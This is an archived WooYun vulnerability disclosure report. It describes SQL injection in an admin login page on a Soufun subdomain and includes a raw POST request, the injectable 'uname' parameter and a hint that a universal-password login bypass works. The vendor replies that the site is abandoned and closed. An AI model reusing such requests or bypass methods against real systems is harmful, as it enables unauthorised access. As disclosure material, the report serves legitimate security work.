乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-27: 细节已通知厂商并且等待厂商处理中 2015-08-27: 厂商已经确认,细节仅向厂商公开 2015-09-06: 细节向核心白帽子及相关领域专家公开 2015-09-16: 细节向普通白帽子公开 2015-09-26: 细节向实习白帽子公开 2015-10-11: 细节向公众公开
搜房网某管理后台登录页面存在SQL注入漏洞
搜房网某站SQL注入漏洞
SQL注入地址
POST /hr/cgi-bin/admin/login.php HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://space2.soufun.com/hr/cgi-bin/admin/login.htmlAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: space2.soufun.comContent-Length: 50Pragma: no-cacheCookie: global_cookie=4z1dz3kbyo7q3bhhige5fak9c1oidsemrt2; Hm_lvt_71c560ba10f46ed65ed494321dd51b24=1440570805; Hm_lpvt_71c560ba10f46ed65ed494321dd51b24=1440570826; cookiecitys=%B1%B1%BE%A9; Captcha=4B4932353243654C6E5563323446746C66753447725344775655797553633474366B66346643385572572B4B51506C4E2F505444536C41584537504D72434576434E38577673693566334A4F755748414E66363333413D3D; __utmt_t1=1; jiatxShopWindow=1; unique_cookie=U_4z1dz3kbyo7q3bhhige5fak9c1oidsemrt2*6; __utma=77873355.730920994.1440570754.1440570754.1440570754.1; __utmb=77873355.20.10.1440570754; __utmc=77873355; __utmz=77873355.1440570754.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organicuname=admin&pwd=123456&submit_s=%B5%C7%A1%A1%C2%BC
注入参数uname
也可以直接万能密码登录
有大牛
危害等级:低
漏洞Rank:3
确认时间:2015-08-27 19:35
感谢您对搜房安全的关注,此站点为一个废弃多年的站点,目前已经关闭。
暂无